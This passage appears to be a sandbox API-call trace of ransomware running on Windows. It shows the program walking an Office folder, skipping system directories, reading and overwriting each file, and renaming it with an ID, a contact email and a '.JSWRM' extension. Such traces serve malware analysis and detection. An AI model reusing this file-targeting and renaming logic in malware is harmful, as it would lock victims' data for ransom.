lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0116.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0116.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0116.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0116.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0116.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0116.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0116.198] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0116.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0116.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0116.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0116.199] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0116.199] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa3dba42, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa3dba42, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3dba42, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="POWERPNT_K_COL.HXK", cAlternateFileName="POWERP~2.HXK")) returned 1 [0116.199] lstrcmpiW (lpString1="POWERPNT_K_COL.HXK", lpString2=".") returned 1 [0116.199] lstrcmpiW (lpString1="POWERPNT_K_COL.HXK", lpString2="..") returned 1 [0116.199] lstrcmpiW (lpString1="POWERPNT_K_COL.HXK", lpString2="...") returned 1 [0116.199] lstrcmpiW (lpString1="POWERPNT_K_COL.HXK", lpString2="windows") returned -1 [0116.199] lstrcmpiW (lpString1="POWERPNT_K_COL.HXK", lpString2="recovery") returned -1 [0116.199] lstrcmpiW (lpString1="POWERPNT_K_COL.HXK", lpString2="perflogs") returned 1 [0116.199] lstrcmpiW (lpString1="POWERPNT_K_COL.HXK", lpString2="documents and settings") returned 1 [0116.199] lstrcmpiW (lpString1="POWERPNT_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0116.200] lstrcmpiW (lpString1="POWERPNT_K_COL.HXK", lpString2="system volume information") returned -1 [0116.200] lstrcmpiW (lpString1="POWERPNT_K_COL.HXK", lpString2="msocache") returned 1 [0116.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_K_COL.HXK", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0116.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0116.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_K_COL.HXK", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT_K_COL.HXK", lpUsedDefaultChar=0x0) returned 18 [0116.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_K_COL.HXK", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0116.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0116.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="POWERPNT_K_COL.HXK", cchWideChar=18, lpMultiByteStr=0x241100, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="POWERPNT_K_COL.HXK", lpUsedDefaultChar=0x0) returned 18 [0116.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0116.200] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0116.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.200] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.200] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0116.200] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.201] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0116.201] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.201] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0116.201] ReadFile (in: hFile=0x238, lpBuffer=0x209800, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209800*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0116.201] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.202] WriteFile (in: hFile=0x238, lpBuffer=0x209800*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209800*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0116.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0116.202] CloseHandle (hObject=0x238) returned 1 [0116.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0116.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0116.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0116.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0116.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0116.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0116.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.202] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\POWERPNT_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\powerpnt_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0116.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0116.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0116.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0116.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0116.203] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7b75b6a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7b75b6a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9d4a250, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x126048, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PPINTL.DLL", cAlternateFileName="")) returned 1 [0116.205] lstrcmpiW (lpString1="PPINTL.DLL", lpString2=".") returned 1 [0116.205] lstrcmpiW (lpString1="PPINTL.DLL", lpString2="..") returned 1 [0116.205] lstrcmpiW (lpString1="PPINTL.DLL", lpString2="...") returned 1 [0116.205] lstrcmpiW (lpString1="PPINTL.DLL", lpString2="windows") returned -1 [0116.205] lstrcmpiW (lpString1="PPINTL.DLL", lpString2="recovery") returned -1 [0116.205] lstrcmpiW (lpString1="PPINTL.DLL", lpString2="perflogs") returned 1 [0116.205] lstrcmpiW (lpString1="PPINTL.DLL", lpString2="documents and settings") returned 1 [0116.205] lstrcmpiW (lpString1="PPINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0116.205] lstrcmpiW (lpString1="PPINTL.DLL", lpString2="system volume information") returned -1 [0116.205] lstrcmpiW (lpString1="PPINTL.DLL", lpString2="msocache") returned 1 [0116.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0116.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPINTL.DLL", lpUsedDefaultChar=0x0) returned 10 [0116.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0116.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0116.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPINTL.DLL", lpUsedDefaultChar=0x0) returned 10 [0116.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0116.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0116.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0116.206] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa284551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa284551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa2f6cec, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4571e, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PREVIEWTEMPLATE.POTX", cAlternateFileName="PREVIE~1.POT")) returned 1 [0116.206] lstrcmpiW (lpString1="PREVIEWTEMPLATE.POTX", lpString2=".") returned 1 [0116.206] lstrcmpiW (lpString1="PREVIEWTEMPLATE.POTX", lpString2="..") returned 1 [0116.206] lstrcmpiW (lpString1="PREVIEWTEMPLATE.POTX", lpString2="...") returned 1 [0116.206] lstrcmpiW (lpString1="PREVIEWTEMPLATE.POTX", lpString2="windows") returned -1 [0116.206] lstrcmpiW (lpString1="PREVIEWTEMPLATE.POTX", lpString2="recovery") returned -1 [0116.206] lstrcmpiW (lpString1="PREVIEWTEMPLATE.POTX", lpString2="perflogs") returned 1 [0116.206] lstrcmpiW (lpString1="PREVIEWTEMPLATE.POTX", lpString2="documents and settings") returned 1 [0116.206] lstrcmpiW (lpString1="PREVIEWTEMPLATE.POTX", lpString2="$RECYCLE.BIN") returned 1 [0116.206] lstrcmpiW (lpString1="PREVIEWTEMPLATE.POTX", lpString2="system volume information") returned -1 [0116.206] lstrcmpiW (lpString1="PREVIEWTEMPLATE.POTX", lpString2="msocache") returned 1 [0116.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PREVIEWTEMPLATE.POTX", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0116.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PREVIEWTEMPLATE.POTX", cchWideChar=20, lpMultiByteStr=0x240f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PREVIEWTEMPLATE.POTX", lpUsedDefaultChar=0x0) returned 20 [0116.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PREVIEWTEMPLATE.POTX", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0116.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0116.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PREVIEWTEMPLATE.POTX", cchWideChar=20, lpMultiByteStr=0x241178, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PREVIEWTEMPLATE.POTX", lpUsedDefaultChar=0x0) returned 20 [0116.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0116.206] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0116.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.206] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.206] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0116.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PREVIEWTEMPLATE.POTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\previewtemplate.potx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.207] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=284446) returned 1 [0116.207] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.207] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0116.207] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0116.262] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.262] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0116.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0116.263] CloseHandle (hObject=0x238) returned 1 [0116.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0116.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0116.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0116.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0116.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0116.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0116.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.263] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PREVIEWTEMPLATE.POTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\previewtemplate.potx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PREVIEWTEMPLATE.POTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\previewtemplate.potx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0116.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0116.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0116.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0116.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0116.265] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa284551, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa284551, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3dba42, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48d3e, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="PREVIEWTEMPLATE2.POTX", cAlternateFileName="PREVIE~2.POT")) returned 1 [0116.265] lstrcmpiW (lpString1="PREVIEWTEMPLATE2.POTX", lpString2=".") returned 1 [0116.265] lstrcmpiW (lpString1="PREVIEWTEMPLATE2.POTX", lpString2="..") returned 1 [0116.265] lstrcmpiW (lpString1="PREVIEWTEMPLATE2.POTX", lpString2="...") returned 1 [0116.265] lstrcmpiW (lpString1="PREVIEWTEMPLATE2.POTX", lpString2="windows") returned -1 [0116.265] lstrcmpiW (lpString1="PREVIEWTEMPLATE2.POTX", lpString2="recovery") returned -1 [0116.265] lstrcmpiW (lpString1="PREVIEWTEMPLATE2.POTX", lpString2="perflogs") returned 1 [0116.265] lstrcmpiW (lpString1="PREVIEWTEMPLATE2.POTX", lpString2="documents and settings") returned 1 [0116.265] lstrcmpiW (lpString1="PREVIEWTEMPLATE2.POTX", lpString2="$RECYCLE.BIN") returned 1 [0116.265] lstrcmpiW (lpString1="PREVIEWTEMPLATE2.POTX", lpString2="system volume information") returned -1 [0116.265] lstrcmpiW (lpString1="PREVIEWTEMPLATE2.POTX", lpString2="msocache") returned 1 [0116.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0116.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PREVIEWTEMPLATE2.POTX", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0116.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PREVIEWTEMPLATE2.POTX", cchWideChar=21, lpMultiByteStr=0x241330, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PREVIEWTEMPLATE2.POTX", lpUsedDefaultChar=0x0) returned 21 [0116.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0116.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PREVIEWTEMPLATE2.POTX", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0116.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0116.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PREVIEWTEMPLATE2.POTX", cchWideChar=21, lpMultiByteStr=0x241308, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PREVIEWTEMPLATE2.POTX", lpUsedDefaultChar=0x0) returned 21 [0116.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0116.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 